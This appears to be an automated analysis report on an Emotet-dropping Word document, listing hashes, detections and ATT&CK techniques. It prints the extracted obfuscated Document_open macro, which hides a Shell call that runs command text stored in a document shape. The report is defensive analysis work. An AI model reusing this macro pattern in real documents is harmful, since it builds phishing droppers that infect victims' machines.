Emotet Office (OLE) malware analysis — malicious · e38417b58ac64880

MALICIOUS

Office (OLE)

66.4 KB Created: 2018-11-06 19:20:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: 978d860c31d371536cb18ff04b4c4c0c SHA-1: a38d9c92dc0745d0888afd063119c12dacec7586 SHA-256: e38417b58ac64880ae35cacfc0216ea1fb6577ea61237b8f84bcd08322fd3cc1

210 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro that attempts to execute a complex PowerShell command. This command decodes and decompresses a Base64 string, then uses it to construct and execute a PowerShell command. The ClamAV detection and heuristic firings strongly indicate this is a dropper for Emotet malware, likely designed to download and execute a second-stage payload.

Heuristics 7

ClamAV: Doc.Downloader.Sload-6743946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sload-6743946-0
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1306 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1306 bytes
SHA-256: `eeae01a79ed1f2164714949f0afb1ae4af1825c2096e438ede231aa6d630175f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iZDtoWhm" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next DZXiQr = (AafHKz + JjSGw * zHPCtd + Wfiaf + JjcpvS + JQQVfN / (kcHFM + CdwJU)) sZWbZL = WakHfl + mPIunn / (qMwso + WjZwi / sLvspj + NzQpRc + JVGtqY + kBMZik / (QqAmY + smqXTL)) nZUrEb = obhtWo + jjquX / cTuYdN + djjSV + fGjvZ + DiMIv viFQh = (VPIZLo + iHuIjl + CvsXN + AInMr / (GDXPKt + UZZEi + pStzb + XOsXzp)) HWwFP = FJTfwO + IAHrOX / IwwkR + TzPKwK + pMHjiD + EVmEz WpNcv = ahiGsj + OQtcr + zXsGK + iTXOf / Zdqvf + wIAwI + nFsOIz + uHiifi / (CRNODT + iSGYT + jjjKBP + TFTTK * PkPvu + QvJfu) ohEmlq = MSOXUh + VQzzu * (iERSX + NCpWB / YGbbOS + cVMwWs) Const iILfwj = 215064006 - 215064006 Shell@ Shapes(1).TextFrame.TextRange.Text + vfMhziQk + PadmWvN, iILfwj cKiLl = sFlzhY + ISzaHl + RLLFh + BIopPr * (jioEi + PRZAI) botBiQ = hRIva + zSHKKT * qpqMdC + zjqAJ + fmGBd + RhBzbU FIPDZ = (itCRw + iIskQ / (iqFtid + wsWzrK + mbXss + QuJZjN * jzGWhJ + ZdALi)) cbMtL = (vmCkz + ffnjfM / nMwmz + iFdIb / OGanT + jVGutz) End Sub

SHA-256: eeae01a79ed1f2164714949f0afb1ae4af1825c2096e438ede231aa6d630175f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iZDtoWhm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   DZXiQr = (AafHKz + JjSGw * zHPCtd + Wfiaf + JjcpvS + JQQVfN / (kcHFM + CdwJU))
   sZWbZL = WakHfl + mPIunn / (qMwso + WjZwi / sLvspj + NzQpRc + JVGtqY + kBMZik / (QqAmY + smqXTL))
   nZUrEb = obhtWo + jjquX / cTuYdN + djjSV + fGjvZ + DiMIv
   viFQh = (VPIZLo + iHuIjl + CvsXN + AInMr / (GDXPKt + UZZEi + pStzb + XOsXzp))
   HWwFP = FJTfwO + IAHrOX / IwwkR + TzPKwK + pMHjiD + EVmEz
   WpNcv = ahiGsj + OQtcr + zXsGK + iTXOf / Zdqvf + wIAwI + nFsOIz + uHiifi / (CRNODT + iSGYT + jjjKBP + TFTTK * PkPvu + QvJfu)
   ohEmlq = MSOXUh + VQzzu * (iERSX + NCpWB / YGbbOS + cVMwWs)
Const iILfwj = 215064006 - 215064006
Shell@ Shapes(1).TextFrame.TextRange.Text + vfMhziQk + PadmWvN, iILfwj
   cKiLl = sFlzhY + ISzaHl + RLLFh + BIopPr * (jioEi + PRZAI)
   botBiQ = hRIva + zSHKKT * qpqMdC + zjqAJ + fmGBd + RhBzbU
   FIPDZ = (itCRw + iIskQ / (iqFtid + wsWzrK + mbXss + QuJZjN * jzGWhJ + ZdALi))
   cbMtL = (vmCkz + ffnjfM / nMwmz + iFdIb / OGanT + jVGutz)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.